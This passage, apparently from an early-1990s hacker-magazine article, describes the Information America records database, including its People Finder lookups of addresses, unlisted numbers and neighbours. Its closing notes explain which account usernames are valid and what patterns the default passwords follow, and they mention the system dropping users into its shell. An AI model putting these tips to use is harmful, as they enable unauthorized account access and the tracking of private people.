+                   2. Corporate & Limited Partnership Records (COR)
+                   3. State & County UCCs, Liens & Judgments (ULJ)
+                   4. State UCC & Lien Filings (UCC)
+
+ 5. Sleuth (SL)                          6. Litigation Prep (LP)
+
+NATIONWIDE SERVICES                    COUNTY & COURT RECORDS
+ 7. People Finder (PF)                  15. County Records (COU)
+ 8. Executive Affiliation (EA)          16. Bankruptcy Records (BNK)
+ 9. Business Finder (BF)                17. Lawsuits (LS)
+10. Business News (BN)                  18. Real Property Asset Locator (RP)
+11. SEC Filings (SEC)                   19. Real Prop, Liens & Judgments (RLJ)
+12. Duns Business Records Plus (DB)
+13. Name Availability/Reservation (NAR) 75. Help Line (HL)
+14. Document Ordering eXpress (DOX)     99. Exit the System (OFF)
+
+Enter the menu number or abbreviation of your choice:
+
+   ------------------------------[ Main Menu ]-----------------------------
+
+     Of the three categories, options under NATIONWIDE SERVICES are the most
+interesting.  Information America is easy to use, completely menu-driven and
+features extensive on-line Help.  That having been said, White Knight and I
+will cover only a few of IA's features and leave exploration of the more
+obscure ones to the reader.
+
+
+ PEOPLE FINDER
+ ~~~~~~ ~~~~~~
+     The power of People Finder lies not only in its ability to tap various
+large store-houses of data, but in its flexibility of search criteria.  (NOTE:
+People Finder is available Monday through Friday, 7:00 AM to midnight, Eastern
+Standard time.  Holidays are excluded.)
+
+     People Finder is made up of four services: SKIP TRACER, TELEPHONE TRACKER,
+PERSON LOCATOR, and PEOPLE FINDER MULTITRACK.
+
+     Depending on the information available, a People Finder profile may
+include current address, telephone number, residence type, length of residence,
+gender, date of birth, up to four household members and their dates of birth
+and a neighbor listing.
+
+SKIP TRACER traces a person's moves or verifies the current address when all
+you have is an old address.  You will enter the person's name, street number,
+street name, and either the Zip Code or city/state.  If your subject is in IA's
+files, a profile will display that includes the address he moved to (or current
+address), phone number, length of residence, and more.  You may also request a
+list of 10 of the person's neighbors.  A profile on the current resident at
+your subject's old address and up to 10 neighbors there may also be available.
+This gives you several contacts to help you find your subject.
+
+TELEPHONE TRACKER tracks down the owner of a telephone number. You must enter
+the phone number and either the area code or the city/state.  If a match is
+found, you may look at a profile of that individual/residence and a listing of
+up to 10 neighbors.
+
+PERSON LOCATOR helps you locate a person when specific address information is
+unavailable.  Enter the person's name and indicate whether you wish to conduct
+a search by city, state(s), zip or nationwide* PERSON LOCATOR will compile a
+list of names (up to 300 names for nationwide and up to 100 names for
+individual state searches) that match the information entered.  When you find
+the right name, you may request a profile and neighbor listing for that
+individual.
+
+PEOPLE FINDER MULTITRACK helps you locate multiple people during one search.
+Search results are available the following business day.  For each of your
+subjects, enter the name and indicate the geographic area you wish to search --
+nationwide*, multi state, state, city or zip.  You may enter up to 25 names per
+search.  Sign off the system and let Information America do the work for you.
+The following business day, log on to Information America and access the People
+Finder Menu by entering PF at the Information America Beginning Menu.  From the
+People Finder Menu, you may view the results of People Finder MultiTrack by
+entering RR (Review People Finder MultiTrack).
+
+REVIEW PEOPLE FINDER MULTITRACK allows you to review the status of each of the
+searches you requested.  You may choose to view the results of each completed
+search at this time.  Search results will be stored for seven days from the day
+you requested the search.  You may review the search results at any time during
+the seven-day time period through the Review People Finder MultiTrack option.
+Search results include a summary listing of names that match the information
+entered (up to 300 names for nationwide and up to 100 names for individual
+state searches).  From the summary, you may select individual profiles and
+neighbor listings.
+
+* Nationwide search is not available for specific common surnames.  For a list
+  of these surnames, enter #92 View Common Names (VC), from the People Finder
+  Menu.
+
+
+   -------------------------[ People Finder Menu ]-------------------------
+
+INFORMATION AMERICA NETWORK
+
+                          P E O P L E    F I N D E R
+                 (Copyright 1991, Information America, Inc.)
+           Client Billing Code: 123456
+
+    1. Person Locator (PL)           (Search by name & location)
+    2. Skip Tracer (ST)              (Search by name & last known address)
+    3. Telephone Tracker (TT)        (Search by telephone number)
+    4. People Finder MultiTrack (PX) (Multiple searches by name & location
+                                      with results available next business day)
+    5. Review People Finder MultiTrack Results (RR)
+
+                    70. Revise Client Billing Code  (BC)
+                    75. Help Screen  (?)
+                    92. View Common Names (VC)
+                    95. Description of Service  (DES)
+                    99. Go to Beginning Menu  (BEG)
+                    OFF Exit off the System  (OFF)
+
+   -------------------------[ People Finder Menu ]-------------------------
+
+     If People Finder locates your subject, a profile containing the following
+information can be displayed:
+
+Name                   Usually first and last name of head of household.
+Address                Street or route, city, state, and ZIP.
+
+* The following fields will display only if the information is available. *
+
+Phone Number           Current phone number, if listed in the phone book.
+Approx. Birth Date     Birth date of the individual listed in the Name field.
+                       (May be an approximation.)
+Gender                 (FEMALE, MALE, UNKNOWN) Refers to person in Name field.
+Length of Residence    Number of consecutive years this person has appeared at
+                       this address.
+Residence Type         Number of last names found at this address. (Useful in
+                       identifying multi-family residences.)  Can be single,
+                       double, triple, quad, 5-9 units, 10-19 units, 20-49
+                       units, 50-100 units, 100+ units.
+Additional Household   Names and approximate birth dates of up to 4
+    Members            individuals residing at this address and having the
+                       same last name as person listed in Name field.
+                       (Usually taken from birth records.)
+
+
+ People Finder: A Sample Search
+ ~~~~~~ ~~~~~~  ~ ~~~~~~ ~~~~~~
+   ------------------------[ People Finder Search ]------------------------
+
+Last Name:   public                     First Name:   jane
+Enter City or ZIP code.
+City: ANYTOWN                           ZIP Code: 90210
+
+
+Searching...
+
+
+ INFORMATION AMERICA NETWORK--PEOPLE FINDER
+ Name Searched: PUBLIC JANE
+
+                                PERSON LOCATOR
+                               Last Name Summary
+
+ No.  First Name       Street               City/State      ZIP   Phone No.
+ --- ------------ ----------------------  ---------------- ----- ------------
+   1 JANE         27 AVENIDA AVE          ANYTOWN       CA 90210 213-727-8023
+*  2 JOHN         69 CALLE DE LOS PUTOS   ANYTOWN       CA 90211 213-000-0000
+
+* PUBLIC JANE has been found as an additional household member.
+
+Searching...
+
+
+ INFORMATION AMERICA NETWORK--PEOPLE FINDER  -  Detail
+ Name Searched: PUBLIC JANE
+
+                             PERSON LOCATOR
+                            Resident Profile
+
+                        Name: JANE PUBLIC
+                     Address: 27 AVENIDA AVE
+                              ANYTOWN, CA 90210
+   Approximate Date of Birth: 10/66
+                      Gender: FEMALE
+         Length of Residence: 3 YEARS
+              Residence Type: SINGLE
+
+                    **** Additional Household Names ****
+                    Name       Approximate Date of Birth
+                    MICHAEL              04/68
+
+
+Searching...
+
+ INFORMATION AMERICA NETWORK--PEOPLE FINDER  -  Detail
+ Name Searched: PUBLIC JANE
+
+                               PERSON LOCATOR
+                              Neighbor Listing
+
+        Resident: JANE PUBLIC
+         Address: 27 AVENIDA AVE
+                  ANYTOWN, CA 90210
+                                                                 Residence
+       Name               Phone#           Address            Length(yrs)/Type
+------------------------------------------------------------------------------
+WILLIAM PRESTON       (818) 727-8125  12 BOGUS AVE               12 SINGLE
+THEODORE LOGAN        (818) 725-8643  17 BOGUS AVE               04 DOUBLE
+KRIS APPLEGATE        (818) 685-2112  19 BOGUS AVE               03 TRIPLE
+MARTIN MCFLY          (818) 727-0353  26 BOGUS AVE               23 SINGLE
+STAN CISNEROS         (818) 727-4973  30 BOGUS AVE               16 SINGLE
+LUCY BYRNE            (818) 727-8765  33 BOGUS AVE               10 SINGLE
+JONATHAN DEPP         (818) 725-2012  35 BOGUS AVE               06 SINGLE
+
+   ------------------------[ People Finder Search ]------------------------
+
+
+ Notes on People Finder
+ ~~~~~ ~~ ~~~~~~ ~~~~~~
+     IA is only as accurate as public records reflect.  People who move
+frequently or move from apartment to apartment (students, for instance) are
+either not likely to be found in IA, or the information IA provides is likely
+to be out-dated.  In one search we performed, IA concluded that our subject had
+lived at his residence for 3 years when, in fact, the subject had been living
+there for over 15 years.
+
+     Unlisted telephone numbers are frequently available through IA if, for
+example, your subject's unlisted number has appeared in a City Directory.
+Curiously, information seems to be disappearing from IA, in some cases.  A year
+ago, White Knight and I looked up a celebrity's address and telephone number,
+both of which IA correctly found.  When we performed the same search recently,
+IA failed to find the celebrity in its records.  Searches on other individuals
+which once listed their unlisted telephone numbers now yield "000-0000".  We
+have no explanation for why this seems to have happened.
+
+
+ Overview of IA's other options
+ ~~~~~~~~ ~~ ~~~  ~~~~~ ~~~~~~~
+SLEUTH
+======
+
+     By creating a list of affiliated names -- "clues" -- Sleuth helps you
+uncover relationships between businesses and individuals.  Enter a name and
+check official records from up to 49 government agencies.
+
+CONTENTS:  Over 100 searches* combined in one... from these services:
+
+            State UCC/lien filings in: CA,CO,IL,IA,MD,MA,MO,NE,NC,PA,SC,TX
+Corp/LP records in above states, PLUS: AZ,CT,DE,GA,IN,MI,NV,OK,OR,UT,WI
+     Sales and Use Tax information in: CA, TX
+
+ County Assumed/Fictitious Names from: Los Angeles, San Francisco (CA)
+                                       Dallas, Harris (TX)
+              County UCC filings from: Fulton, Cobb, DeKalb, Gwinnett (GA)
+                                       Dallas, Harris (TX)
+
+
+LITIGATION PREP
+========== ====
+
+CONTENTS: State Corporate & Limited Partnership Information from:
+                Arizona*, California, Colorado, Connecticut*, Delaware,
+                Florida, Georgia, Illinois*, Indiana, Iowa, Maryland,
+                Massachusetts, Michigan, Missouri, Nebraska, Nevada,  North
+                Carolina*, Oklahoma, Oregon, Pennsylvania,  South Carolina,
+                Texas, Utah, Washington, and Wisconsin (* indicates Limited
+                Partnership information is not available from these states).
+
+          Searches include the following, where available:
+                Business Names, Owner Names, Prior Names, Assumed Names,
+                Fictitious Owner Names, Trade Names, DBA Names, and Merged
+                Out/Consolidated Names
+
+GENERAL DESCRIPTION:  Litigation Prep allows you to simultaneously search state
+corporate and limited partnership information and county-filed fictitious
+business and assumed names, to assist you in obtaining the details you need to
+begin preparing a lawsuit.
+
+HOW THIS SERVICE WILL HELP YOU:  Litigation Prep is designed to help litigation
+professionals when gathering information to file a lawsuit.  This service
+provides the researcher with valuable pieces of information, such as business
+name, agent name and address, principal address, type and status.  Good
+Standing/Existence Status is also available in the following states:
+
+AZ, CT, DE, GA, IL, IN, IA, MA, MI, MO, NE, NC, OK, OR, PA, SC, TX, UT, WA,
+and WI.
+
+CONTENTS/SOURCES:  Below, you will find the informational contents searched
+in each state.  Inactive records are included for informational purposes.
+Unless otherwise specified, files are updated weekly.
+
+HOURS:  Litigation Prep is available Monday through Friday, from 8:00 AM to
+12:00 AM Eastern Time.  The FLORIDA component of the service is only available
+>from 8:30 AM to 7:00 PM Eastern Time, Monday through Friday.
+
+
+CORPORATE GLOBAL, CORPORATE & LIMITED PARTNERSHIPS
+========= ======  ========= = ======= ============
+
+CONTENTS: State Corporate & Limited Partnership Records from:
+
+                AZ*, CA, CO, CT*, DE, FL, GA, IL*, IN, IA, MD, MA, MI, MO, NE,
+                NV, NC*, OK, OR, PA, SC, TX, UT, WA, and WI
+                (* indicates Limited Partnership Records are not available
+                from these states).
+
+          States included in the Officer/Partner Name search:
+
+                CA, CO, FL, GA, IL, IN, IA, MA, MI, MO, NV, OR, PA, TX, and UT.
+
+     State Corporate and Limited Partnership Records are available in many key
+states.  A complete listing of states and the information provided by state is
+available on the following screens.  Records are accessible one state at a
+time or all at once (CORPORATE GLOBAL).  When you conduct a CORPORATE GLOBAL
+name search, an Index screen will list in which states matches have been found.
+You can either review all matches, or select specific states to view.
+
+    From the CORPORATE GLOBAL menu, you have the following search capabilities:
+
+       Business Name - Includes all entities available in the online state
+                       corporate & limited partnership files.
+
+Officer/Partner Name - Information varies by state, but may include officers,
+                       directors, incorporators and partners.
+
+Note:  Individual states offer additional options such as a search by
+       Corporate ID (Charter) Number or Registered Agent Name.
+
+SOURCE & UPDATE INFORMATION:
+
+     State Corporate & Limited Partnership files are obtained from the official
+state agency.  Records searched vary from state to state.  For the exact types
+searched by state, see the following screens.  Inactive records are included
+for informational purposes.  Files are updated weekly unless noted in each
+specific state description.
+
+     In California and Texas, there is a unique search option called BUSINESS
+LOCATOR.
+
+     In California, this option searches the Board of Equalization (BOE),
+Licensing and Taxation Information which is the official governing source of
+California Sales and Use Tax permit holders.  This information is available
+only from the California menu and is not included in the Global service.  The
+file is updated monthly.
+
+     In Texas, this option searches the Sales & Use Tax Taxpayer Information
+file, which is comprised of the official record of the Office of the
+Comptroller of Public Accounts.  As in California, this information is
+available only from the Texas menu and is not included in the Global service.
+The file is updated by Information America weekly.
+
+
+STATE & COUNTY UCCs
+===== = ====== ====
+
+CONTENTS:  State UCC and lien filings from:
+              California*, Colorado*, Florida, Illinois, Iowa*,
+              Maryland, Massachusetts*, Missouri, Nebraska*,
+              North Carolina, Pennsylvania, South Carolina, and Texas*.
+              (* indicates Lien filings available from these states)
+
+           County UCC, lien, and judgment filings from:
+              California:  Los Angeles and San Francisco counties
+              Georgia:  Cobb, DeKalb, Fulton, and Gwinnett counties
+              Texas:  Dallas Metroplex and Harris county
+
+GENERAL DESCRIPTION:  State & County UCCs, Liens and Judgments allows you to
+search state UCC and lien filings, plus county UCC, lien and judgment filings.
+
+HOW THIS SERVICE WILL HELP YOU:  State & County UCCs, Liens and Judgments may
+be used by anyone who is looking for information on outstanding UCCs, liens or
+judgments on an individual or business, as well as assets or financial
+obligations.  For example, litigators, real estate specialists, and merger and
+acquisition  specialists may use this service to assist them in the following
+ways:
+
+Litigators:
+   ** Obtain financial information on prospective clients
+   ** Help determine the outstanding obligations of the opposing party which
+      could impact the client's ability to seize assets
+   ** Help determine the financial relationships between the opposing party
+      and other entities
+   ** Help determine if the debts and obligations of the opposing party are a
+      possible motive for filing suit
+
+Real Estate Specialists:
+   ** Conduct a cursory look at the beginning of the transaction to help
+      determine the existence of filings which could cloud title
+   ** Help determine if the seller has outstanding tax liens filed against
+      him/her
+   ** Help determine whether any personal property involved with the
+      transaction has a prior security interest
+
+Merger and Acquisition Specialists:
+   ** Help determine financial standing of a firm or a principal of the firm
+      and identify outstanding obligations
+   ** Help determine the financial relationships the firm or principal has
+      with other entities
+   ** Determine personal property owned by the firm or principal that is being
+      used to secure loans
+   ** Conduct a final check before closing to help confirm that no new matters
+      have been filed which could adversely affect the transaction
+
+SEARCH RESULTS:  Searches by Name will retrieve matches of the name searched in
+the following:
+
+   From the state UCC and lien files - debtor names
+   From the county UCC, lien and judgment files -
+     California: grantors
+        Georgia: grantors, taxpayers, debtors, and defendants
+          Texas: all parties (in Dallas Metroplex); grantors and grantees
+                 (from Abstracts of Judgment only), and debtors (in Harris
+                 County)
+
+PLEASE NOTE:  Searches of debtors in Florida will retrieve only active filings.
+The option to view Florida's inactive files is offered, at no additional
+charge, when you select either E (=Exit) or N (=New Search) from the summary
+screen or last page of a detail report.
+
+HOURS: State & County UCCs, Liens and Judgments is available Monday through
+Friday, from 8:00 AM to 12:00 AM EST.  The FLORIDA  component of the service is
+only available from 8:30 AM to 7:00 PM EST, Monday through Friday.
+
+
+STATE UCC & LIEN FILINGS
+===== === = ==== =======
+
+GENERAL DESCRIPTION:  STATE UCC & LIEN FILINGS allows you to simultaneously
+search UCC and lien filings in all of the states that Information America has
+on-line or you may search filings in a specific state.
+
+Our UCC service includes documents filed under the Uniform Commercial Code in
+the following states:
+
+        California            Colorado            Florida
+        Illinois              Iowa                Maryland
+        Massachusetts         Missouri            Nebraska
+        North Carolina        Pennsylvania        South Carolina
+        Texas
+
+Additionally, the following liens are included:
+            California: Federal and state tax liens, attachment liens
+                        and judgment liens.
+              Colorado: Federal tax liens and judgment liens.
+                  Iowa: Federal tax liens, Verified liens
+                        and Thresherman's liens.
+         Massachusetts: State tax liens and child support liens.
+              Nebraska: Agricultural input liens, consumer liens, and
+                        statutory liens.
+                 Texas: Federal tax liens, utility security instruments,
+                        and farm filings.
+
+SOURCE:  Data is obtained directly from the official state sources:  The
+Secretary of State in California, Colorado, Illinois, Iowa, Massachusetts,
+Missouri, Nebraska, North Carolina, South Carolina and Texas; the Department
+of State in both Florida and Pennsylvania; and the Maryland Department of
+Assessments and Taxation.
+
+SEARCH RESULTS:  Unless indicated otherwise, a debtor name search will reveal
+listings of active and inactive debtors that match the name being searched.  A
+secured party/assignee search will result in a list of matching active and
+inactive secured parties and assignees.  Instrument numbers can be searched
+only in an individual state.
+
+     In FLORIDA, a debtor or secured party search will reveal only active
+filings.  The option to search Florida's inactive files is offered, at no
+additional charge, at the end of a detail report for an active Florida UCC.
+
+     In MASSACHUSETTS, a secured party search will locate secured parties
+and, if the UCC has been assigned, assignors; it will not locate assignees
+since they are not included in the database.
+
+HOURS:  STATE UCC & LIEN FILINGS is available Monday through Friday, from
+8:00 AM to 12:00 AM EST. The FLORIDA component of the service is only available
+>from 8:30 AM to 7:00 PM EST, Monday through Friday.
+
+
+COUNTY COURT RECORDS
+====== ===== =======
+
+     Information America provides online access to local court records from
+four states.
+
+     California - Records are available from Los Angeles, Orange and San
+Francisco counties.  Real Property Asset Locator is available for the entire
+state.
+
+     Georgia - The Atlanta metro area is online.  It includes Cobb, DeKalb,
+Fulton, and Gwinnett counties.
+
+     Pennsylvania - Records are available for Philadelphia county.
+
+     Texas - Records are available for the Dallas/Fort Worth metro area, which
+includes Collin, Dallas, Denton, and Tarrant counties.  Records are also
+available for Harris County (Houston).
+
+     Records vary from county to county, but may include Abstracts of Judgment,
+Assumed Names, Civil Suits, County UCCs, General Execution Dockets, Limited
+Partnerships, Lis Pendens, Probate and Domestic Suits, Real Property Filings,
+Tax Liens and Trade Name Index.  The Court Record menus specify the records
+available in each county.
+
+
+LAWSUITS
+========
+
+                  LAWSUITS EFFECTIVE DATE INFORMATION
+
+File                         Source                  Begin        Through
+-------------------------    ---------------------   ---------    --------
+CALIFORNIA
+  Los Angeles County         County Clerk            01-01-80     12-31-91
+    Civil  (Superior)
+    Domestic  (Superior)
+    Probate  (Superior)
+    Criminal  (Superior)                             01-01-80     12-31-91
+  Orange County              County Clerk            01-01-85     12-13-91
+    Civil  (Superior)
+    Family Law  (Superior)
+  San Mateo County           County Clerk            01-01-84     11-09-91
+    Civil  (Superior)
+
+CALIFORNIA
+  Santa Clara County         County Clerk            01-01-85     12-04-91
+    Civil  (Superior &
+                 Municipal)
+    Probate  (Superior)
+    Criminal  (Superior)
+    Family Law  (Superior)
+  Contra Costa County        County Clerk            01-02-80     11-30-91
+    Civil  (Superior)
+    Probate  (Superior)
+    Family Law  (Superior)
+    Wills                                            01-02-90     11-30-91
+  San Diego County           County Clerk            06-18-74     01-16-92
+    Civil  (Superior)
+
+GEORGIA
+  Cobb Civil (Superior)      County Clerk            1982         01-17-92
+  DeKalb Civil (Superior)    County Clerk            1981         01-15-92
+  Fulton Civil (Superior)    County Clerk            1980         12-26-91
+  Gwinnett Civil (Sup/State) County Clerk            1990         01-18-92
+
+ILLINOIS
+  Cook Civil Law Division    Clerk of Circuit Court  01-01-75     12-16-91
+  All Districts (Circuit)
+  Cook Civil Municipal       Clerk of Circuit Court  01-01-85     12-16-91
+  Division 1st District-
+  Chicago- (Circuit)
+
+NEW JERSEY*
+Civil Law Division           Clerk of Superior Court 01-01-88     SEE BELOW
+ Atlantic   12-09-91    Bergen      11-19-91    Burlington  12-03-91
+ Camden     11-20-91    Cape May    12-05-91    Cumberland  10-18-91
+ Essex      12-04-91    Gloucester  12-09-91    Hudson      12-06-91
+ Hunterdon  12-10-91    Mercer      10-17-91    Middlesex   12-06-91
+ Monmouth   11-08-91    Morris      12-05-91    Ocean       12-04-91
+ Passaic    12-04-91    Salem       12-09-91    Somerset    11-22-91
+ Sussex     11-25-91    Union       12-02-91    Warren      12-02-91
+
+*New Jersey Superior Court Civil Lawsuit information is collected for
+ Information America.  Extreme care is exercised in gathering this information.
+ However, it is not the official legal reporting organ of the New Jersey
+ Superior Court.  Information pertaining to civil action arising from
+ automobile accident claims, forfeiture, condemnation and name change
+ litigation is not collected and is not contained in this file.
+
+ NEW YORK
+  New York (Supreme) &       Office of Court         ***          01-13-92
+   Suffolk County (County)   Administration
+
+ *** The beginning dates for New York County's Supreme Civil Court and Suffolk
+     County Civil Court cases vary from county to county and are listed below.
+     The "Current Through" date represents the date the Office of Court
+     Administration last compiled the information for Information America.
+
+     Bronx     11-1985        Nassau     02-1978         Queens       12-1985
+     Dutchess  08-1985        New York   11-1985         Rockland     09-1985
+     Erie      11-1985        Orange     08-1985         Suffolk      03-1983
+     Kings     11-1985        Putnam     08-1985         Westchester  01-1981
+
+ PENNSYLVANIA
+  Philadelphia Civil         Office of Prothonotary  01-1982      01-11-92
+  (Common Pleas)
+
+TEXAS
+  Dallas Civil (District)    County District Court   01-01-70     01-10-92
+
+
+REAL PROPERTY ASSET LOCATOR
+==== ======== ===== =======
+
+     Real Property Asset Locator integrates information from several sources to
+help users identify and estimate the value of real assets or identify the owner
+of a particular piece of property.
+
+     The information, which is collected for Information America, is comprised
+of the tax assessor's official roll in each county.  Additional information is
+obtained from private source databases to enhance tax roll information.
+
+     Real Property Asset Locator provides four ways to search.
+
+1.  Asset Locator -- Discover the property owned by an individual or business
+    by entering the name.  You may conduct a global, statewide, metro area,
+    county or city (where taxes are assessed at municipal level) search.
+
+2.  Ownership Locator -- Discover the identity of the property owner by
+    entering the address of the property in question.
+
+3.  Property of Comparable Value -- Estimate value of real property based on
+    sales of similar real property in the given geographic area.
+
+4.  Assessor's Parcel Number -- Discover the identity of the property owner by
+    entering the Assessor's Parcel Number of the property in question.
+
+     Real Property Asset Locator is available in Arizona, California,
+Washington DC, Delaware, Florida, Georgia, Illinois, Kansas, Maryland,
+Massachusetts, Missouri, New Jersey, New York, Pennsylvania, Texas and
+Virginia.
+
+
+REAL PROPERTY ASSET TRANSFERS
+==== ======== ===== =========
+
+     Real Property Asset Transfers integrates information from several sources
+to help you identify recent real property ownership transfers.
+
+     Use Real Property Asset Transfers to help confirm that your party still
+owns a particular piece of property or has recently acquired new property.
+
+     Real Property Asset Transfers provides two ways to search.
+
+1.  Asset Transfers--Discover the property acquired or sold by an individual or
+    business by entering the name.  You may conduct a statewide, metro area or
+    county search.
+
+2.  Ownership Transfers--Discover the identity of the seller and buyer of a
+    particular piece of real property by entering the address of the property
+    in question.
+
+     Real Property Asset Transfers information, which is collected for
+Information America, is derived from deed transfers maintained by county
+recorders' offices in each county.  However, it is not the official legal
+reporting organ of the county recorders' offices.
+
+     Real Property Asset Transfers is available in select counties in Arizona,
+California, Colorado, District of Columbia, Florida, Georgia, Hawaii, Illinois,
+Maryland, Massachusetts, Nevada, New Jersey, New York, Ohio, Pennsylvania,
+Tennessee, Virginia, and Washington.
+
+
+EXECUTIVE AFFILIATION
+========= ===========
+
+CONTENTS:  Over 30 million executives nationwide.  One search will display
+           companies nationwide where an individual is listed as an executive.
+           Two types of reports may be available: the Executive Profile and the
+           Executive Brief.
+
+           The Executive Profile is derived from information gathered by
+           American Business Information, Inc (ABI).  ABI compiles business
+           listings from the yellow pages of 5,000 telephone directories.
+           Telephone calls to every business are then conducted to collect
+           the executive name and title.
+
+           The Executive Brief is derived from Corporate and Limited
+           Partnership Records filed in the following states: AZ,CA,CO,CT,FL,
+           GA,IL,IN,IA,MD,MA,MI,MO,NE,NV,NC,OK,OR,PA,SC,TX,UT,WA,WI.
+           NOTE:  Delaware Records are not included.
+
+     Executive Affiliation is invaluable when you need to know the business
+affiliations of an adverse party.  When you enter an executive's name, reports
+on over 30 million executives nationwide are searched.  You will receive a
+Summary Screen with a concise listing of where your selected individual is
+listed as an executive.  The detail report for each affiliation will be either
+an Executive Brief or an Executive Profile.
+
+     The Executive Profile is derived from yellow page listings of 5,000
+telephone directories nationwide.  The listings are individually verified to
+collect the name of the top executive at that location and their title.  The
+information report may include this information in addition to the business
+address, telephone number, SIC code, and type of business.  The titles for
+which an Executive Profile may be available include: President, Vice President,
+Chairman of the Board, Owner, Executive Director, Manager, Administrator,
+Principal, Publisher, Pastor, and Rabbi.
+
+     The Executive Brief is derived from Corporate and Limited Partnership
+Records filed in the following states:  AZ, CA, CO, CT, FL, GA, IL, IN, IA, MD,
+MA, MI, MO, NE, NC, NV, OK, OR, PA, SC, TX, UT, WA, & WI.
+
+(NOTE: Delaware Records are not included.  Florida Records are available
+Monday through Friday, 8:30 a.m. to 7:00 p.m. EST.)  The second line in the
+detail heading will list from which state Corporate/LP Record the information
+is obtained.  The information report may include executive name, title,
+address, business name and address, as well as other executives' names,
+titles, and addresses associated with that business. Executive Briefs may be
+available for Officers, Partners, Agents, and Incorporators.
+
+USE EXECUTIVE AFFILIATION TO:
+
+  *  Learn about an adverse party's business affiliations as part of
+     background checking.
+
+  *  Verify names and addresses for pleadings and depositions.
+
+  *  Uncover an executive's involvement in different businesses throughout
+     the country to determine possible transfer of assets, or other companies
+     to be named in a suit.
+
+  *  Obtain background information on an executive as a crucial part of
+     performing due diligence.
+
+  *  Explore possible conflicts of interest by looking for an executive's
+     involvement with other companies.
+
+  *  Check on the business affiliations of a prospective client.
+
+
+BUSINESS FINDER
+======== ======
+
+        SOURCE:  American Business Information, Inc.
+
+      CONTENTS:  Over 14 million U.S. and 1.7 million Canadian business
+                 listings compiled from the yellow pages of nearly 5,000
+                 telephone directories. Contains over 9.5 million separate
+                 companies and 2 million professionals.
+
+       UPDATES:  ABI continuously revises the information in the file, and
+                 updates the data from available telephone directories
+                 within six months after publication of the directory.
+                 Information America receives quarterly updates from ABI.
+
+
+BUSINESS NEWS
+======== ====
+
+                 SOURCE:  Comtex Scientific Corporation
+
+               CONTENTS:  News stories from major national and international
+                          newswires, such as UPI, Kyodo, and TASS, press
+                          releases, and other various sources.
+
+                          Stories are available from November 1989.
+
+                UPDATES:  Twice Daily
+
+     Business News allows you to gather articles from major national and
+international newswires either by name, ticker symbol, industry or topic.
+Business News industry categories include:
+
+ 1. Advertising  (AD)     19. Electronics  (EL)        37. Photography  (PO)
+ 2. Aerospace  (AE)       20. Entertainment  (EN)      38. Plastics  (PL)
+ 3. Agriculture  (AG)     21. Environmental Srv  (ES)  39. Prec Metals  (PM)
+ 4. Autos  (AU)           22. Financial Srv  (FS)      40. Publishing  (PB)
+ 5. Aviation  (AV)        23. Food  (FD)               41. Railroads  (RR)
+ 6. Banking  (BK)         24. Forestry Prod  (FP)      42. Real Estate  (RE)
+ 7. Beverages  (BV)       25. Freight  (FR)            43. Restaurant  (RT)
+ 8. Biotechnology  (BI)   26. Health Care  (HC)        44. Retail  (RL)
+ 9. Broadcasting  (BR)    27. Industrial Prod  (IP)    45. Rubber  (RB)
+10. Bldg Materials  (BM)  28. Insurance  (IN)          46. Ship Building  (SB)
+11. Business Srv  (BS)    29. Machinery  (MA)          47. Telecommun  (TL)
+12. Chemicals  (CH)       30. Metals  (ME)             48. Textiles  (TX)
+13. Computers  (CM)       31. Mining  (MI)             49. Tobacco  (TB)
+14. Construction  (CN)    32. Nuclear Energy  (NE)     50. Toys  (TY)
+15. Consumer Prod  (CP)   33. Office Equipment  (OE)   51. Travel Srv  (TR)
+16. Defense Contrt  (DC)  34. Personal Care  (PC)      52. Trucks  (TK)
+17. Education Srv  (ED)   35. Petroleum Prod  (PT)     53. Utilities  (UT)
+18. Electronic Publ  (EP) 36. Pharmaceuticals  (PH)
+
+
+BANKRUPTCY RECORDS
+========== =======
+
+        SOURCE:  The Bankruptcy Records are compiled for Information America
+                 from the official records at the U.S. Bankruptcy Courts.
+                 These records contain all publicly available cases filed in
+                 the following states:  California, Georgia - Northern District
+                 (Atlanta and Gainesville only), New Jersey, Pennsylvania -
+                 Eastern District, and Texas.
+
+      CONTENTS:  Bankruptcy records for both individuals and businesses are
+                 available.  The records include debtor names, case number,
+                 location and date of filing, chapter number and more.
+
+       UPDATED:  Weekly (California, Georgia, Pennsylvania, and Texas)
+                 Bi-weekly (New Jersey)
+
+     You may select bankruptcy records by debtor name, social security/FEIN
+number or by case number.
+
+
+SEC FILINGS
+=== =======
+
+          SOURCE: SEC Online, Inc.
+
+        CONTENTS: Full text documents filed with the Securities and Exchange
+                  Commission by public companies traded on the New York and
+                  American Stock Exchanges as well as selected National Market
+                  System companies from NASDAQ.  The documents available
+                  online - 10-Ks, 10-Qs, Annual Reports, Proxy Statements, and
+                  foreign company 20-Fs - contain all footnotes and selected
+                  exhibits.  A Company Profile is also included that
+                  summarizes basic corporate information.
+
+  EFFECTIVE DATE: Information current from 07-01-1987.
+
+         UPDATES: Information America receives updates weekly from SEC Online.
+
+     Searches may be performed by company name or ticker symbol.
+
+
+ Notes on Information America
+ ~~~~~ ~~ ~~~~~~~~~~~ ~~~~~~~
+     We mentioned that usernames beginning with "BIDA" are recognizable to the
+IA system as IA accounts (as opposed to shell accounts).  More than likely,
+other usernames are also valid as IA accounts.
+
+     As with most systems, IA passwords are often easy to guess.  Initial
+passwords, which are assigned when an account is first created, are usually
+composed of the account holder's first name, or first name plus a middle or
+last initial.  In some cases, the password is made up of the digits in the
+username plus the first name of the account holder.  In other cases, the
+password is two random letters plus a two-digit number (ex: PG13).  If users
+are ever encouraged to change their password from its initial value, they
+rarely seem to do so.
+
+     You've probably noticed that IA has specific operating times (Eastern
+Standard Time).  Most of IA's functions are inoperable during weekends and
+holidays and outside those specific operating hours.  Occasionally on weekends,
+IA itself is down.  Or more interestingly -- particularly on weekends -- the IA
+interactive environment will malfunction, dropping you into the VAX shell.
+
+     IA's clients are mostly lawyers and paralegals working at legal firms, but
+the FBI is also a major IA client.  Television programs in the 60s and 70s
+which depicted an FBI "Big Brother" computer system scared the public enough so
+that it and the Congress have continually resisted efforts by the FBI to
+implement such a system.  In the mid 80s, for example, Congress voted against
+the implementation of an FBI computer system which would allow them to monitor
+telephone calls.  Information America is the perfect solution for the FBI's
+bureaucratic quandary.
+
+     IA has existed for at least two and a half years, but has remained
+relatively unknown to the Telecom community until last year when MoD began
+using IA's People Finder to locate and terrorize people.  IA's low profile
+isn't surprising; public backlash against Lotus' "MarketPlace" CD ROM --
+which contained marketing information on only a few million people at most --
+forced Lotus to abandon its project altogether after having invested tens of
+thousands of dollars in advertising alone, just as it was about to release
